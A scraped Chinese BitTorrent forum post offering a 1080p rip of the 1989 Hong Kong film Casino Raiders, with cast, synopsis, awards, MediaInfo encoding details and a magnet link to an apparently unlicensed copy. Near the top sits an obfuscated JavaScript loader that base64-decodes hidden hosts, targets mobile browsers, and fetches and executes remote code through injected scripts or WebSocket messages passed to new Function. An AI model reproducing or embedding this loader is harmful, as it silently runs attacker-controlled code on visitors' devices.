至尊无上[国粤语配音/中文字幕].Casino.Raiders.1989.1080p.BluRay.x265.10bit.FLAC.2.0.2Audio 7.42GB

版主小s 21天前 158

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 至尊无上 / Casino Raiders

◎片 名 至尊無上

◎年 代 1989

◎产 地 中国香港

◎类 别 剧情 / 动作

◎语 言 汉语普通话 / 英语 / 粤语 / 日语

◎上映日期 1989-06-29(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0098708/

◎豆瓣评分 7.4/10 (10258人评价)

◎豆瓣链接 https://movie.douban.com/subject/1300581/

◎片 长 127分钟

◎导 演 向华胜 Jimmy Heung (id:1327878)

王晶 Jing Wong (id:1274331)

元奎 Corey Yuen (id:1289150)

◎编 剧 王晶 Jing Wong (id:1274331)

向华胜 Jimmy Heung (id:1327878)

向华强 Charles Heung (id:1037691)

◎演 员 谭咏麟 Alan Tam (id:1050648)

刘德华 Andy Lau (id:1054424)

陈玉莲 Idy Chan (id:1000955)

关之琳 Rosamund Kwan (id:1028064)

黄智强 Ji Keung Wong (id:1431206)

向华强 Charles Heung (id:1037691)

高雄 Eddy Ko (id:1313798)

龙方 Fong Lung (id:1290470)

仇云波 Robin Shou (id:1009315)

沈威 Wai Shum (id:1297537)

黄斌 Ronald Wong (id:1301199)

麦克·阿伯特 Mike Abbott (id:1055934)

张敏 Sharla Cheung (id:1005297)

鲁亦诗 Louis Roth (id:1321259)

黄志强 Kirk Wong (id:1301193)

彭润祥 Yun-chiang Peng (id:1431212)

罗树琪 Shu-Kei Law (id:1394347)

傅宏达 Wang-Tat Foo (id:1417136)

鹿村泰祥 Yasuyoshi Shikamura (id:1330491)

黄金棠 Kam-Tong Wong (id:1410167)

布鲁斯·方丹 Bruce Fontaine (id:1458121)

向华胜 Jimmy Heung (id:1327878)

梁弘志 Hung-chih Liang (id:1377238)

戴乐民 Romeo Díaz (id:1282921)

陈俊杰 Henry Chan (id:1280422)

黄小龙 Hsiao-lung Huang (id:1345887)

元奎 Corey Yuen (id:1289150)

◎标 签 刘德华 / 香港 / 香港电影 / 赌片 / 谭咏麟 / 王晶 / 动作 / 1989

◎简 介

有“亚洲第一快手”之称的陈亚蟹(刘德华 饰)因出老千入狱,刑满出狱后,他的搭档Sam(谭咏麟 饰)第一时间令助手波波(关之琳 饰)迎接。亚蟹刚获得自由,便同Sam合演了一出里应外合扮猪吃老虎的好戏。不久,两人受朋友所托,远赴美国调查日本出千团伙,结果顺利为赌场挽回损失,令日本人颜面扫地,日本方面自此寻机报复。Sam在美国结识了富家大小姐童可人(陈玉莲 饰),Sam使出众多浪漫桥段抱得美人归,也令岳父接纳了自己,但代价却是要疏远亚蟹等不体面的朋友。同时,日本出千集团首脑宫本父子加紧了报仇的步骤,亚蟹为搭救Sam,被对方废了自己引以为傲的快手。面对宫本的咄咄逼人,亚蟹与Sam兄弟俩终于再次联手对敌。

◎获奖情况 (共2项)

第26届台北金马影展 (1989)

金马奖 最佳原创配乐(提名)

└──梁弘志 (id:1377238)

第9届香港电影金像奖 (1990)

最佳新演员(提名)

└──龙方 (id:1290470)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 326522990874297002398980024012538934252 (0xF5A60A62814FA8F2720AF5C6F67473EC)

  4. Complete name : Ca[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.42 GiB

  8. Duration : 2 h 4 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 8 510 kb/s

  11. Encoded date : UTC 2021-09-25 12:56:10

  12. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 4 min

  21. Bit rate : 7 722 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 076 pixels

  24. Display aspect ratio : 16:9

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.156

  31. Stream size : 6.74 GiB (91%)

  32. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings : rc=crf / crf=21.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.75 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=9 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1076 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default : Yes

  35. Forced : No


  36. Audio #1

  37. ID : 2

  38. Format : FLAC

  39. Format/Info : Free Lossless Audio Codec

  40. Codec ID : A_FLAC

  41. Duration : 2 h 4 min

  42. Bit rate mode : Variable

  43. Bit rate : 377 kb/s

  44. Channel(s) : 2 channels

  45. Channel layout : L R

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 11.719 FPS (4096 SPF)

  48. Bit depth : 16 bits

  49. Compression mode : Lossless

  50. Stream size : 336 MiB (4%)

  51. Title : Cantonese

  52. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  53. Language : Chinese

  54. Default : Yes

  55. Forced : No


  56. Audio #2

  57. ID : 3

  58. Format : FLAC

  59. Format/Info : Free Lossless Audio Codec

  60. Codec ID : A_FLAC

  61. Duration : 2 h 4 min

  62. Bit rate mode : Variable

  63. Bit rate : 380 kb/s

  64. Channel(s) : 2 channels

  65. Channel layout : L R

  66. Sampling rate : 48.0 kHz

  67. Frame rate : 11.719 FPS (4096 SPF)

  68. Bit depth : 16 bits

  69. Compression mode : Lossless

  70. Stream size : 340 MiB (4%)

  71. Title : Mandarin

  72. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  73. Language : Chinese

  74. Default : No

  75. Forced : No


  76. Text #1

  77. ID : 4

  78. ID in the original source medium : 4609 (0x1201)

  79. Format : PGS

  80. Muxing mode : zlib

  81. Codec ID : S_HDMV/PGS

  82. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  83. Duration : 2 h 0 min

  84. Bit rate : 27.9 kb/s

  85. Count of elements : 2162

  86. Stream size : 24.2 MiB (0%)

  87. Title : chs

  88. Language : Chinese

  89. Default : Yes

  90. Forced : No

  91. Original source medium : Blu-ray


  92. Text #2

  93. ID : 5

  94. ID in the original source medium : 4608 (0x1200)

  95. Format : PGS

  96. Muxing mode : zlib

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 2 h 0 min

  100. Bit rate : 28.6 kb/s

  101. Count of elements : 2154

  102. Stream size : 24.6 MiB (0%)

  103. Title : cht

  104. Language : Chinese

  105. Default : No

  106. Forced : No

  107. Original source medium : Blu-ray


  108. Text #3

  109. ID : 6

  110. ID in the original source medium : 4610 (0x1202)

  111. Format : PGS

  112. Muxing mode : zlib

  113. Codec ID : S_HDMV/PGS

  114. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  115. Duration : 2 h 0 min

  116. Bit rate : 29.6 kb/s

  117. Count of elements : 2156

  118. Stream size : 25.4 MiB (0%)

  119. Title : eng

  120. Language : English

  121. Default : No

  122. Forced : No

  123. Original source medium : Blu-ray


  124. Menu

  125. 00:00:00.000 : 第 01 章

  126. 00:12:32.666 : 第 02 章

  127. 00:18:15.208 : 第 03 章

  128. 00:30:05.833 : 第 04 章

  129. 00:40:00.958 : 第 05 章

  130. 00:52:32.666 : 第 06 章

  131. 01:03:01.208 : 第 07 章

  132. 01:12:54.833 : 第 08 章

  133. 01:23:58.208 : 第 09 章

  134. 01:33:15.458 : 第 10 章

  135. 01:44:10.291 : 第 11 章

  136. 01:53:58.000 : 第 12 章


TAGS 动作 剧情

磁力链:
  • magnet:?xt=urn:btih:3D447982F697E26E6256EADA1754F59F21E621D6
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖